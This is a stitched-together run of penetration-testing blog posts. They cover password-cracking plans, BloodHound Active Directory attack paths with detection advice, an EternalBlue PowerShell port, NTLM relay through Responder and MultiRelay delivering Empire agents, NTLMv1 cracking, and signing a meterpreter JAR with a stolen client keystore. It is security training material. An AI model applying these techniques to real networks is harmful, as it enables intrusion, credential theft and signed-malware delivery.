Another big surprise was that most of the passwords were 9+ characters, with 37% having 12 or more characters. This is outside of reasonable brute-force territory. Brute forcing 12 characters with a single 1080 Ti would take roughly a quick 168 BILLION years. Not an option… Kudos unnamed clients.

Another thing we check for, is the use of the company's name in passwords. From the looks of it, people are pretty good about not using their company name as their password. Another win for the users.

With this quick tidbit of data, we can start to see why the append_d rule adds an average of 10% more cracks. We can focus on identifying better rules and masks for future pentests with more data from dumped passwords, but for now it looks like we're on the right track.

Conclusion

With all the trial and error out of the way, you can now focus creating a "crack plan" to help you more-effectively utilize your cracking time. Our suggested methodology, based on our test case, is as follows:

Start with the rockyou wordlist

Run it by itself, then run through the appendd, appends, and leetspeak rules

You can run through all 4 attempts in about 30 seconds total.

The crack rate is unexciting at 22% for all 4 attempts, but for 30 seconds effort, it's WAY worth it.

Switch to the crackstation wordlist

Run it by itself, then run through the appendd, appends, and leetspeak rules (in that order)

You can run through the all 4 attempts in about 30 minutes. Not too bad for a 15 GB file

Crackstation, with these rules, had a 42.5% crack rate in our test case. That should be more than enough creds to get started, and the wait isn't unbearable.

End it with the Weakpass 2.0 wordlist to get those last few potential passwords

Run it by itself, then run through the appendd, appends, and leetspeak rules (in that order)

You can run through the all 4 attempts in about an hour

Weakpass 2.0 had a 57.5% crack rate in our test case.

With a $1200 build and under 2 hours' worth of cracking effort, we cracked just under 60% of the hashes in our test case. We also know that these passwords are mostly 9+ characters from our password analyzer script. So, they're not necessarily "weak" in entropy regards. Overall, this build isn't out of reach for the hobbyist password cracker, and should provide an effective crack-rate when used with a strong wordlist and rules.

But if you still haven't gotten what you need by this point… you'll have to start trying more advanced techniques, which we'll save for another post.

When I came across the tool BloodHound, it quickly became one of the go-to tools in my arsenal. BloodHound has increased my speed and efficiency on most engagements and so I wanted to share what I've learned about the tool to help you get started with it.

When I came across the tool BloodHound, it quickly became one of the go-to tools in my arsenal. BloodHound has increased my speed and efficiency on most engagements and so I wanted to share what I've learned about the tool to help you get started with it. In this blog post, I'll take you through how to get started with BloodHound and how to use it to map and own Active Directory environments.

History

BloodHound was inspired by a need for an offensive dashboard that graphically represents Active Directory domain escalation attack paths. BloodHound was developed by Rohan Vazarkar, Andrew Robbins, and Will Schroeder and released during DEF CON 24. It was built on several existing toolsets and conceptual models: PowerView, Graph Theory, Derivative local admin theory, Dijkstra's Algorithm, and PowerPath.

BloodHound quickly enumerates group membership information and user privileges and compiles them to an easy-to-understand GUI. An offensive practitioner can visualize attack paths based on these relationships and find the quickest path of attack for any account, group, or computer in the domain. With limited time on each engagement, being able to quickly map relationships and locate viable attack paths can help pentesters utilize their time more effectively.

Up and Running with BloodHound

On the surface, BloodHound is relatively intuitive. The clean web interface, with the inclusion of several default queries, is simple enough to understand without extensive research or experience. However, this does not imply BloodHound lacks depth.

PowerShell Ingestor

Once you have established a foothold on the network, you can import the PowerShell ingestor for BloodHound to collect data about trusts, users, and all other object relationships in an Active Directory environment. BloodHound uses a modified version of PowerView to collect data. We can use either the BloodHound Empire Module or another C2 framework for data collection.

Empire

The PowerShell ingestor BloodHound.ps1, implements the Invoke-BloodHound function for collecting and exporting data.

Select the module: _ Powershell/situation_awareness/network/bloodhound
_Select the appropriate download locationRun the module:CSVs are exported to the defined location

CSV Files are written to the current directory:

Uploading and Querying

Once you have exported the data to CSV, download the files and upload them to BloodHound

Alternatively, you can export the data directly to the Neo4j REST API using the -URI and -UserPass arguments as described in the BloodHound Github _ wiki._

Querying

The example below displays the query "Find Top 10 users with the Most Admins".

BloodHound also includes custom node selection where a specified source, and target node are selected for attack path mapping. Perhaps you would like to skip finding a path to domain admin and would rather move straight to a database or the domain controller itself.

You can select the compromised object as a start node and the target machine as an end node.

Cypher

BloodHound uses Neo4j as its graph database. Neo4j interactions are driven by "Cypher". Cypher was inspired by SQL and was developed as a declarative graph query language for describing patterns in graphs visually. BloodHound comes pre-built with several "Cypher" queries; however, you can create your own to meet your specific needs.

The built-in queries are good enough for a penetration tester to achieve success on most engagements without the need to develop additional custom Cypher queries. This, and the requirement to learn Cypher, result in custom queries being frequently ignored. However, learning even just a bit of Cypher can prove to be well worth the effort, as custom queries are a powerful feature of BloodHound.

Common terms from Graph theory are directly applicable to the Neo4j Graph Database, such as edges and nodes. In the context of BloodHound, a node represents either a User, Group, Computer, or Domain. Each node represents an object that can be acted upon when moving through an Active Directory Environment.

Edges represents relationships between nodes. In the context of BloodHound, edges represent MemberOf, AdminTo, HasSession, TrustedBy. In version 1.3 of BloodHound, a new set of edges for access control entries was introduced. These include ForceChangePassword, AddMemebers, GenericAll, GenericWrite, WriteOwner, WrieDACL, and AllExtendedRights. Together edges and nodes create the paths that we use in BloodHound.

BloodHound applied

The following example is a simple use-case for BloodHound in which we use a theoretically compromised user as a start point; identifying the strategic lateral movements required to help us pivot through the network. Our target is the Domain Administrator account. We've selected a compromised account as the start point and the Domain Administrator account as our target node.

In the example above we have compromised the user TEST1@PTEST.LOCAL after acquiring valid user credentials via Responder or through an exploit.

This user has administrative access to both TESTHOST.PTEST.local and TESTHOST2.PTEST.local indicated by the "AdminTo" relationships.

3.Theoretically, we can use the MSF module "psexec_psh" to gain an active session on either TESTHOST.PTEST.local or TESTHOST2.PTEST.local.

BloodHound indicates both machines have an active session with the user, SMARAR@PTEST.local.

5.With the active session on TESTHOST.PTEST.LOCAL , we can enumerate processes and the owner of each process. We do this to locate a process owned by the identified user with the active sessions. If we find a process for one of the users, we can then steal the token from that process "stealtoken PID" (ex. "stealtoken 694"). By stealing this token, we can impersonate the selected user.

Cleartext passwords

SAM Hashes

Analyzing the attack path, we can see our target user has administrative access to DC-01.PTEST.LOCAL, which is our target.

If we wish to verify this, we can use "ls \DC-01\C$\". This command lists the C$ directory and can only be done with valid access".

With the user having administrative access to this machine, we can use this user for our attack path.

BloodHound indicates SMARAR@PTEST.LOCAL has a session with DC-01.PTEST.LOCAL. We identify this by the hassession relationship between the user and the identified machine.

8.Using SMARAR@PTEST.LOCAL , we can psexec_psh into DC-01.PTEST.LOCAL. Once we have established a session on the system, we again have multiple options to compromise the administrator account and achieve our goal. Using either Mimikatz, Lazykatz, or stealing a token we can gain access to the user ADMINISTRATOR@PTEST.local. Once we've completed this step, we have successfully compromised the Domain Administrator account.
#

ACL Attack Paths

Version 1.3 of BloodHound introduced an exciting new feature which gives an attacker more options to exploit different Active Directory objects. Version 1.3 includes new edge types based on Active Directory object control. The update adds several new edges based on object permissions that BloodHound indicates as abusable. ACL-based attack paths identify exploitable object access control entries (ACE)s within discretionary access control Lists (DACL)s.

DACLs

Active Directory has several common securable objects which contain security descriptors. These security descriptors contain DACLs which hold Access Control Entries. Common objects include users, groups, and computers which correlate to the nodes in BloodHound.

The example below you can see the DACL and individual ACEs for the user smarar.

An object can have different access rights to another object. For example, Domain Admins usually have full control over user accounts within the domain. Alternatively, an authenticated user perhaps only has read access to certain information about the user. As an attacker, we are interested in understanding how we can leverage these access rights to gain control over objects of interest to get us closer to our goal.

DACLs in BloodHound

Version 1.3 of BloodHound includes the PowerShell "ACLs" cmdlet that performs the collection of object to object permissions in an AD environment.

Invoke-Bloodhound _ -CollectionMethod ACLs _:

When we upload the data to BloodHound we can see the new edge types displayed.

In the example above we can see two new edge types of object to object permissions:

GenericAll: Full object control, including the ability to add other principals to a group, change a user password without knowing its current value, register an SPN with a user object, etc. Abused with Set-DomainUserPassword or Add-DomainGroupMember cmdlets.

_WriteDACL: The ability to write a new ACE to the target object's DACL. For example, an attacker may write a new ACE to the target object DACL giving the attacker "full control" of the target object. Abused with Add-NewADObjectAccessControlEntry. _("BloodHound 1.3 – The ACL Attack Path Update." wald0.Com)

These are just two examples of new edges. Other edges include ForceChangePassword, AddMembers, GenericAll,GenericWrite,WriteOwner, WriteDACL,AllExtendedRights.

When BloodHound creates an attack path against Active Directory using ACLs, it will likely use more than one type of permission. Exploiting these permissions can be invasive and detected fairly easily. If an attacker, for example, leverages 'GenericAll' permission to change a password, and that user then is unable to log in, this could alert the user of your presence.

Will Schroeder (harmj0y) and Lee Christensen (tifkin) created a whole suite of new PowerShell cmdlets to exploit each ACE. These functions have not been committed to the Master Branch yet and so you will need to grab the Powerview.ps1 script from the dev branch, if you want to try them out.

Upload the script to Empire and take a crack at some of these awesome cmdlets.

You can check to see if you have done this correctly by verifying the new cmdlets existNote: Many of these modules are still in development and may not work correctly out of the box with Empire.

#

A Blue Team Perspective

Risk Auditing

Auditing Active Directory best practices and properly maintaining an effective AD security posture is a complex and challenging topic that is vital to an organizations overall security. Assessing an AD environment should be done frequently to ensure a secure architecture and alignment with business goals.
An organization must be able to answer questions including but not limited to; Who has what level of privileged access in our AD environment? Who can create or delete objects? Who can reset passwords and modify group memberships?

BloodHound is a viable tool for performing risk audits for an Active Directory environment. The same attack paths used by an attacker can be identified and remediated by a defensive practitioner. A defensive practitioner can use BloodHound to easily visualize object privileges and relationships. The addition of ACL attack paths in version 1.3 also added far more opportunities to identify risk past simply group membership and active session information. Defensive practitioners can audit security descriptors by enumerating DACL entries. This gives us deeper insight to specific object permissions.

After running BloodHound against your own environment, you can identify risks in object memberships, effective permissions, GPOs, or DACL entry misconfigurations. An organization should carefully audit these policies and ensure an appropriate architecture for their organization that enforces least privilege and a tiered administrative model. This will ensure that even if an attacker has mapped the environment, there will be limited and monitored viable attack paths.

Detection and Mitigation

But what can we do as far as active defense? When this tool is used as a reconnaissance tool against our environment, what can a defensive practitioner do to detect and mitigate BloodHound? BloodHound is nearly invisible, so understanding how it works at its core is essential to be able to detect it.

BloodHound's core components are data ingestion and visualization. As mentioned previously, BloodHound is a specialized version of Powerview. Powerview only needs version 2.0 of PowerShell to run, making it able to run on default configurations on machines running Windows 7 or later.

The collection modules which PowerView uses to enumerate AD information do not require special permissions. These can be run by regular users on the network. Enumeration is done using LDAP via ADSI. Since there is traditionally no logging for these features, this makes detection of BloodHound increasingly difficult.

The traffic sent to the domain controller through port 389 is negligible. Traditional event logging would not provide us any events in this situation.

So, what does BloodHound traffic look like? While running BloodHound, we can look at Wireshark to see what behavior BloodHound prompts. We can see that BloodHound causes high volumes of LDAP traffic. An option for defensive practitioners is to monitor for this high volume of LDAP traffic and enable a rule to log this traffic.

Network administrators can enable a rule that would log high volumes of LDAP traffic with LDAP sessions longer than traditional. It is best to baseline your network traffic and then observe the changes when running BloodHound.

Wrapping Up

With limited time to analyze each unique Active Directory environment, its trusts, relationships, and objects, BloodHound could mean the difference between hours of effort or quickly owning an environment in a matter of a few steps. The reduced overhead and complexity in AD analysis alone are enough to make BloodHound a must have tool in any penetration testers toolbelt.

Bloodhound continues to receive new features and the developers of BloodHound are continuously researching ways to create more stealthy attack paths. Be sure to check out the ACE attack path update. Future updates should include exploitable GPO edges.

As pentesters, our job is to demonstrate the risk of unpatched vulnerabilities to the business. The past month, this has largely been an exercise in demonstrating the risk of the eternal blue vulnerability. In order to do this, it is key we as the good guys possess the same tools and capabilities as the bad guys.

The team over at Risk Sense ops has played a key role in providing this capability to the community by reverse engineering eternal blue and developing the MS17_010 metasploit module: https://github.com/RiskSense-Ops/MS17-010. This community developed exploit has allowed us, and other pentest teams, to successfully demonstrate the risk of MS17_010 to many.

There are some situations, however, where running a metasploit module may not be feasible. For example, on many of our red team engagements, we have access to the network through only Empire agents. These agents do not allow port forwarding, and there is not always an easy way to forward traffic from a metasploit instance to the targeted servers. We could of course use a meterpreter shell, or cobalt strike agent, on those servers, but this is not always feasible or desired based on the stealth profile we are trying to achieve.

We ran into several situations where we could have gotten domain admin, or other significantly privileged access if able to run eternal blue, but were unable due to some combination of the above reasons. Internally we called this the 'Eternal Blues' and decided we needed to do something to solve it.

Because eternal blue is such a useful exploit for red teams now and into the near future, we developed a powershell port of RiskSense-Ops metasploit module. This port of the exploit is 100% powershell, and can be easily imported and used in Empire, or Cobalt Strike shells.

This powershell port allowed us to better demonstrate the risk of MS17_010 and cured our blues. We hope it has the same affect for you.

Responder is a go-to tool for most pentesters. We use it quite often on pentests to quickly gain access to a client’s domain. However, when clients enforce strong password policies and their users don’t choose passwords like 'Ilovemykids2017!', we are forced to resort to using masks

Responder is a go-to tool for most pentesters. We use it quite often on pentests to quickly gain access to a client’s domain. However, when clients enforce strong password policies and their users don’t choose passwords like 'Ilovemykids2017!', we are forced to resort to using masks and brute force to crack these hashes. Given the time constraints of some of our pentests, this is not an effective option. Thankfully Laurent Gaffie developed MultiRelay to help us out with this:

MultiRelay is a module in Responder that allows targeted attacks using NTLMv1 and NTLMv2 relay. MultiRelay takes advantage of commonly misconfigured Windows environments not enforcing SMB signing. Not enforcing SMB signing results in both the client and server not performing any validation of each other, or the payload executing. This makes SMB man-in-the-middle attacks possible, which means shells for us!

MultiRelay+Empire = Pwnage

Now for the good stuff, having MultiRelay pop shells for you! First, we need to stage our attack environment by configuring Responder and creating an Empire listener.

We start off by editing our Responder configuration to disable SMB and HTTP servers:

nano /usr/share/responder/Responder.conf

Change the SMB and HTTP settings to 'OFF' and save the file.

Start Responder on local network adapter and give it the NetBIOS redirect and verbose flags.

Ensure that the SMB and HTTP servers are 'OFF' as Responder is starting:

Next, we create our Empire listener:

Note: The default setting will work for our lab environment, but you’ll want to configure these options to fit your needs.

Create a PowerShell one-liner for an Empire agent:

This one-liner is plugged in to MultiRelay as our payload when we successfully replay a NTLM hash:

Note: during a pentest, this is where we sit back and wait for a triggering event to execute our payload. This can take a while in certain environments, but on busy Windows networks it's usually only a few minutes before someone comes along and makes your day!

We’ll move the process along by attempting to accessing a share, so Responder can trigger the payload:

Once we attempt to access a share, Responder immediately gets to work poisoning traffic to the requesting host:

Simultaneously, MultiRelay is setting up a SMB challenge to capture a NTLM hash for replay:

After the requesting host replies to the SMB server with a NTLM hash, MultiRelay replays that hash to the target with our payload:

Then we’re greeted with a nice little prompt telling us things went right:

From here we can perform all our post exploitation activities in Empire, like establishing persistence, running Mimikatz, enumerating directories, and so on. And there you have it, domain pwnage without cracking passwords!

Things to Note

The users targeted in MultiRelay with the -u flag, must be a local administrator on the target host. This usually isn't a problem in most Windows environments, but using 'ALL' will let you know if the user triggering the event has sufficient privileges.

The payload for the -c flag can be changed to whatever you want, such as a Cobalt Strike beacon, a meterpreter shell, or just a Windows shell command. It’s up to you.

NTLM relay attacks have been around since 2001!! This method can be used to quickly exploit this legacy vulnerability and, given the right circumstances, can take an attacker from 0 access to domain admin in a matter of minutes.

For pentesters: SMB Signing kills this legacy vulnerability, dead in the water. MultiRelay will tell you if signing is enabled and to choose a different target; don’t waste your time on targets that have signing enabled.

For admins: SMB Signing kills this legacy vulnerability, dead in the water. Enforce it as much as possible!

Although Disabling SMB can stop NTLM relay attacks there may, at times, be negatives that come along with it.

Certain printers do not support SMB signing, resulting in the inability to print.

Major decreases in SMB performance are common when large files are transferred or many users access the same server simultaneously.

This post will show how to crack NTLMv1 handshakes with the crack.sh service to obtain the NTLM hash. This technique has been publicized since 2013, but is often not leveraged by testers.

Intro

For most pentesters, running Responder.py is one of the first tasks performed on internal penetration tests. This tool will spoof Multicast name resolution queries and give the pentester NTLMv1 and NTLMv2 handshakes. The next step usually is to then attempt to crack those handshakes, usually at a minimum running them against a wordlist such as crackstation.

A NTLMv1 handshake, however, offers another usually ignored cracking option that is guaranteed to give the tester the NTLM hash. Unlike the NTLMv1 handshake, the NTLM hash can be used as a password equivalent in a windows environment.

Required Reading

MS-CHAPv2 handshakes can be broken into two rounds of 56 bit DES (and a third round using only 2bytes of the keyspace), which Moxie Demonstrated could be cracked by modern FPGAS (https://www.youtube.com/watch?v=sIidzPntdCM).

You can use the crack.sh site to extract the NTLM hash from any MSCHAP or NTLMv1 handshake for 20 bucks. The site doesn't take the challenge/response displayed in Responder directly, instead you need to convert it to a token.

The script below can be used to convert the Responder output to a token that will be accepted by crack.sh.

These malicious .jar files were used in a successful social engineering campaign against the client.

These typically overlooked, but easily mitigated vulnerabilities quickly turned into a path to full compromise. We won’t go into much detail about the steps taken after the initial compromise. We’ll save that for another blog.

Now for the fun stuff…

Apache Mod_Status

Apache mod_status is an Apache module allowing administrators to view quick status information by navigating to the /server-status page, i.e. https://www.apache.org/server-status. This isn’t necessarily a vulnerability on its own, but when implemented in public facing production environments, it can provide attackers a treasure-trove of useful information; especially when the ExtendedStatus option is configured.

During our OSINT phase of the engagement, we incorporate a series of Google Dorks, including searching for enabled mod_status:

site:<site> inurl:"server-status" intext:"Apache Server Status for"

Alternatively, given a range of IPs instead of a URL, you can use a Bash “for” loop, like the following, to search for /server-status pages:

However, the loop above will query the server, making it NOT OpSec friendly. Use with caution if stealth is key on an engagement.

So why do we dork for server_status? Because among the valuable information disclosed such as server version, uptime, and process information, the ExtendedStatus option displays recent HTTP requests to the server. If recent requests contain authorization information, such as tokens, you can see why this page would be valuable to an attacker.

In a lot of cases this dork doesn’t come back with any results, but in this scenario, we found several systems with both mod_status and ExtendedStatus configured. What made this even more interesting, was that several HTTP requests were made for files with .jar extensions:

A quick test, using wget, shows this page is accessible without authenticating, and we grab the rt.jar file for further examination.

We wanted to examine all the jars; so, with a quick curl we were able to list all requests containing the .jar extension:

You can also navigate to the page and click all the links to download each file, but we were operating from a C2 server with no GUI, so Bash+Wget was necessary.

Java Static Values

After downloading the jars locally for examination, we used a Java decompiler to examine the code. Our preference is JD-Gui (https://github.com/java-decompiler/jd-gui), but there are plenty of other options out there for decompilers.

After examining the files, it was quickly apparent that several static values were used in the JARs, including passwords, UIDs, and local paths. The biggest finding however, was the Keystore password found in the POM.xml file located in the print.jar applet:

A Java Keystore is used to store authorization or encryption certificates in Java applications. These typically provide the applet with the ability to authenticate to a service or encryption over HTTPS.

The XML file in the screenshot above provided the Keystore name, alias, and password; all we needed to find the Keystore. Luckily the Keystore was stored in the rt.jar file that as also accessible without authentication, and in our possession.

We simply unzipped the rt.jar file to extract the AppletSigningKeystore2016.jks file:

unzip rt.jar

Using the hardcoded Keystore password we discovered in the print.jar applet, we could decrypt the Keystore and export the code signing certificate.

Using OpenSSL, we converted the certificate to a human-readable .crt format:

openssl x509 -inform der -in cert.der -out cert.crt

Further digging in to the discovered jars indicated that the client used the certificate in the Keystore to sign other applets.

Creating Signed Malicious JARs

After determining the AppletSigningKeystore2016.jks Keystore contained the client’s code signing certificate, we shifted our efforts to creating a Java payload with a reverse shell. The payload we used was tailored to the client, but here’s an example of using msfvenom to create a simple JAR file with an embedded meterpreter shell:

Using the Jarsigner application provided in Java’s JDK, we were then able to sign the payload with the AppletSigningKeystore2016.jks Keystore, containing the client’s code signing certificate:

jarsigner -keystore AppletSigningKeystore2016.jks /payload.jar JAR

This made it appear as if the client created the application themselves, thus increasing the likelihood that a user would execute the file and give us a shell:

Wrap-up

So now we had a functioning payload, signed by the client, ready to use against their users. All it took was a little effort during the recon phase, an attention to detail, and a tiny bit of Java knowledge. In many cases, it’s easy overlook what would normally be considered a minor vulnerability, but in this case, not overlooking these tiny details lead to full compromise of the client’s network.

We won’t go in to any details about the social engineering campaign, because all it takes one user to click a link or run an executable, and it becomes an internal pentest. Let’s just say we got a few shells.

]]>Recently on a pentest, we encountered a web application that allowed us to control command line args sent to the 'java' binary on the underlying server. We didn't see any resources published on how to gain arbitrary command execution with just control of the arguments to java, so this blog]]>https://threat.tevora.com/quick-tip-gaining-code-execution-with-injection-on-java-args/cbfd0df7-e718-4d32-95fd-3520c207d1edFri, 16 Dec 2016 18:18:00 GMTRecently on a pentest, we encountered a web application that allowed us to control command line args sent to the 'java' binary on the underlying server. We didn't see any resources published on how to gain arbitrary command execution with just control of the arguments to java, so this blog will demonstrate how you could easily go about this.

About separating commands from data

Most experienced developers will avoid using OS level commands in their web applications, but if it is necessary, they will use a library that allows them to specify the binary separately from user defined input and restrict any shell or control characters from being interpreted. This style of starting command execution usually has a function signature similar to exec() or fork().

You can imagine that an OS command should have some user defined elements given from web app input, but the binary being executed should be defined by the application. A web app might hard code the binary, but allow user input to define the arguments. Using this, in most cases, stops an attacker from easily injecting with only control of arguments since they cannot simply use bash/bat control characters and control of the arguments does not give them control of what binary is being executed